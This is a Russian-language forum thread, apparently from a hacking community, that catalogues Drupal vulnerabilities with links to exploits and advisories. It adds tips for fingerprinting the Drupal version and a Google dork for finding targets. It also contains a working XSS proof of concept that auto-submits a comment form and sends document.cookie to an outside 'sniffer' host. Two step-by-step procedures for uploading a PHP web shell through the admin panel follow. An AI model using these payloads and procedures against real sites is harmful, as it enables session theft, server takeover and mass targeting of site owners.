Обзор уязвимостей Drupal

Drupal < 4.7.6 (post comments) Remote Command Execution Exploit v2 (http://www.milw0rm.com/exploits/3313)

Drupal < 5.1 (post comments) Remote Command Execution Exploit v2 (http://www.milw0rm.com/exploits/3312)

Drupal Cross-Site Request Forgery Vulnerability (Vulnerabilities) (http://www.securityfocus.com/bid/25099)

Drupal Prior To 4.7.11 and 5.6 Multiple Remote Vulnerabilities (Vulnerabilities) (http://www.securityfocus.com/bid/27238)

Drupal Prior To 4.7.8 and 5.3 Multiple Remote Vulnerabilities (Vulnerabilities) (http://www.securityfocus.com/bid/26119)

Drupal <= 5.2 PHP Zend Hash Vulnerability Exploitation Vector (http://www.milw0rm.com/exploits/4510)

Drupal Content Construction Kit Nodereference Module Multiple HTML-injection Vulnerabilities (Vulnerabilities) (http://www.securityfocus.com/bid/25321)

[Injection]
Drupal Database Administration Module Multiple HTML-injection Vulnerabilities (Vulnerabilities) (http://www.securityfocus.com/bid/23440)

Drupal Database Administration Module Multiple HTML-injection Vulnerabilities (Vulnerabilities) (http://www.securityfocus.com/bid/23440)

узнаем версию
http://path/CHANGELOG.txt

отсортировано по убыванию по дате

===================
HIGH

Drupal Meta Tags Module command execution (http://www.securitylab.ru/vulnerability/311954.php)

Обход ограничений безопасности в Drupal (http://www.securitylab.ru/vulnerability/350743.php)
Удаленный пользователь может изменить данные профиля других пользователей.

Drupal Site_Documentation_Module CVE-2008-2271 (http://en.securitylab.ru/nvd/353170.php)

Drupal Comment Upload Module (http://www.securitylab.ru/vulnerability/312521.php)

===================
SQL-inj

SQL-инъекция в Drupal (http://www.securitylab.ru/vulnerability/309460.php)

SQL-инъекция в vbDrupal (http://www.securitylab.ru/vulnerability/309467.php)

SQL-инъекция в Drupal Acidfree Module (http://www.securitylab.ru/vulnerability/289907.php)

SQL-инъекция в Drupal Extended Tracker (http://www.securitylab.ru/vulnerability/276140.php)

SQL-инъекция в Drupal Easylinks (http://www.securitylab.ru/vulnerability/272403.php)

SQL-инъекция в Drupal Bibliography (http://www.securitylab.ru/vulnerability/272058.php)

SQL-инъекция в Drupal Jobsearch (http://www.securitylab.ru/vulnerability/271837.php)

SQL-инъекция и раскрытии е данных в Drupal (http://www.securitylab.ru/vulnerability/268074.php)

===================
Multy

Множественные уязвимости в vbDrupal (http://www.securitylab.ru/vulnerability/311956.php)

Множественные уязвимости в Drupal (http://www.securitylab.ru/vulnerability/311864.php)

Множественные уязвимости в Drupal (http://www.securitylab.ru/vulnerability/305907.php)

Множественные уязвимости в Drupal (http://www.securitylab.ru/vulnerability/305906.php)

Множественные уязвимости в Drupal (http://www.securitylab.ru/vulnerability/275763.php)

Несколько уязвимостей в Drupal (http://www.securitylab.ru/vulnerability/305905.php)

Несколько уязвимостей в Drupal Help Tip (http://www.securitylab.ru/vulnerability/282576.php)

Несколько уязвимостей в Drupal IMCE (http://www.securitylab.ru/vulnerability/275020.php)

===================
CSRF

CSRF атака в Drupal Userpoints Module (http://www.securitylab.ru/vulnerability/312522.php)

CSRF атака в Drupal BUEditor Module (http://www.securitylab.ru/vulnerability/311863.php)

===================
XSS

XSS Drupal Internationalization and Localizer (http://www.securitylab.ru/vulnerability/351988.php)

XSS Drupal E-Publish Module (http://www.securitylab.ru/vulnerability/351985.php)

XSS Drupal Ubercart Module (http://www.securitylab.ru/vulnerability/351978.php)

XSS Drupal Webform Module (http://www.securitylab.ru/vulnerability/349633.php)

XSS Drupal Flickr Module (http://www.securitylab.ru/vulnerability/349603.php)

XSS Multiple Time Sheets (http://www.securitylab.ru/vulnerability/348653.php)

XSS Drupal (http://www.securitylab.ru/vulnerability/347715.php)

XSS Drupal Workflow Module (http://www.securitylab.ru/vulnerability/312232.php)

XSS Drupal Archive Module (http://www.securitylab.ru/vulnerability/312231.php)

XSS Drupal Shoutbox Module (http://www.securitylab.ru/vulnerability/309468.php)

XSS Drupal Token (http://www.securitylab.ru/vulnerability/305949.php)

XSS Drupal Web Links (http://www.securitylab.ru/vulnerability/305812.php)

XSS Drupal Project Issue Tracking Module (http://www.securitylab.ru/vulnerability/304101.php)

XSS Drupal (http://www.securitylab.ru/vulnerability/300276.php)

XSS Drupal LoginToboggan Module (http://www.securitylab.ru/vulnerability/299453.php)

XSS Drupal Project Module (http://www.securitylab.ru/vulnerability/290358.php)

XSS Drupal MySite Module (http://www.securitylab.ru/vulnerability/283182.php)

XSS Drupal Site Profile Directory (http://www.securitylab.ru/vulnerability/274340.php)

XSS Drupal Search Keywords (http://www.securitylab.ru/vulnerability/274292.php)

XSS Drupal Pathauto (http://www.securitylab.ru/vulnerability/273522.php)

XSS Drupal E-commerce (http://www.securitylab.ru/vulnerability/272404.php)

XSS Drupal Easylinks (http://www.securitylab.ru/vulnerability/272403.php)

XSS Drupal Bibliography (http://www.securitylab.ru/vulnerability/272058.php)

XSS Drupal Recipe Module (http://www.securitylab.ru/vulnerability/271914.php)

XSS Drupal (http://www.securitylab.ru/vulnerability/271599.php)

XSS Drupal webform Module (http://www.securitylab.ru/vulnerability/270508.php)

XSS Drupal (http://www.securitylab.ru/vulnerability/268708.php)

XSS Drupal (http://www.securitylab.ru/vulnerability/267140.php)

===================
Module

Drupal Simple Access Module (http://www.securitylab.ru/vulnerability/350745.php)

Drupal Header Image Module (http://www.securitylab.ru/vulnerability/313274.php)
Уязвимость позволяеть получить доступ к административной части приложения.

Drupal Secure Site Module (http://www.securitylab.ru/vulnerability/312524.php)
Злоумышленник, использующий тот же прокси сервер, что и целевой пользователь, может получить доступ с привилегиями целевого пользователя.

Drupal OpenID Module (http://www.securitylab.ru/vulnerability/312517.php)
Злоумышленник может установить злонамеренный OpenID провайдер и произвести спуфинг атаку.

Drupal Forward Module (http://www.securitylab.ru/vulnerability/299326.php)
Удаленный пользователь может с помощью специально сформированного URL получить доступ к запрещенным сообщениям в приложении.

Drupal Print Module (http://www.securitylab.ru/vulnerability/299263.php)
Удаленный пользователь может с помощью специально сформированного URL получить доступ к запрещенным сообщениям.

Drupal Project Issue Tracking Module (http://www.securitylab.ru/vulnerability/292488.php)
Уязвимость заключается в том, что авторизованный пользователь может просмотреть сообщения, даже если они помечены как частные.

Drupal Nodefamily Module (http://www.securitylab.ru/vulnerability/292476.php)
Уязвимость позволяет удаленному пользователю просмотреть и изменить данные в профиле пользователей путем изменения некоторых аргументов в URL.

Drupal Textimage Module (http://www.securitylab.ru/vulnerability/290497.php)
Удаленный пользователь может обойти защиту captcha путем изменения некоторых переменных в запросе.

Drupal Captcha Module (http://www.securitylab.ru/vulnerability/290428.php)
Удаленный пользователь может с помощью специально сформированного запроса обойти проверку captcha.

Drupal Pubcookie Module (http://www.securitylab.ru/vulnerability/273631.php)
Уязвимость существует из-за недостаточной проверки данных в файле pubcookie.module. Удаленный пользователь может обойти процесс аутентификации.

Drupal Form_mail Module (http://www.securitylab.ru/vulnerability/270065.php)
Удаленный пользователь может с помощью символа новой строки внедрить произвольные заголовки в email сообщение.

вот так версию узнать можно:
Смотрим файл: http://www.site.ru/modules/system/system.module ... Там есть строчка:
define('VERSION', 'ТУТ ВЕРСИЯ');
Если строчки нет, то версия ниже 4.7.0
Дополню пост:
в некоторых модулях написана версия, к примеру:
site.ru/modules/aggregator/aggregator.info там прямо смотрим строчку version и всё.
З.Ы. почему бы не прикрепить тему, тоже нужная вещь

PoC:

<HTML>
<TITLE>Drupal reflected XSS by ettee(itdefence.ru)</TITLE><!--
Full HTML =on
"">><<script>img = new Image(); img.src = "http://sniffer/image/s.gif?"+document.cookie;</script>
--><BODY onload="p.submit()">
<form action="http://freelanguage.org/comment/reply/532/1263"<!--target--
> method="post" id="p">
<input type=hidden name="subject" value="aaaaaaaaaaaaaaaaaaaaa">
<input type=hidden name="comment" value='"">><<script>alert(document.
cookie)</script>'>
<input type=hidden name="format" value="3">
<input type=hidden name="form_id" value="comment_form">
<input type=hidden name="op" value='Preview comment'>
</form>
</BODY>
</HTML>

Google dork: powered by "drupal"; intitle:"powered by drupal"

Drupal 6.14 - заливка шелла из админпанели

1) Administer->Site building->Активируем Upload "Allows users to upload and attach files to content" (по умолчанию выключено)->Save configuration

2) Administer->Site configuration->File uploads->Добавляем расширение php3 в список разрешенных

3) Create content->Page->создаем и сохраняем страницу (снимаем галочку с Published)

4) Administer->Content management->Edit только что созданную страницу->File attachments->Загружаем шелл с расширением .php3 (если просто .php - в конец автоматически добавляется .txt)

5) http://drupal.ru/sites/default/files/shell.php3 - шелл

6) Administer->Content management->Удаляем страницу

мои 5 копеек, по файлу robots.txt можно определить версию движка, там есть такая строчка
# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $

ещё один способ загрузки шела:
Site configuration - IMCE settings выбераем категорию пользователей - в графе Non-image file support: добавляем .php
Затем идем сюда Profile - Personal files грузим шелл и он загрузиться в папку files/папка_пользователя/шелл.пхп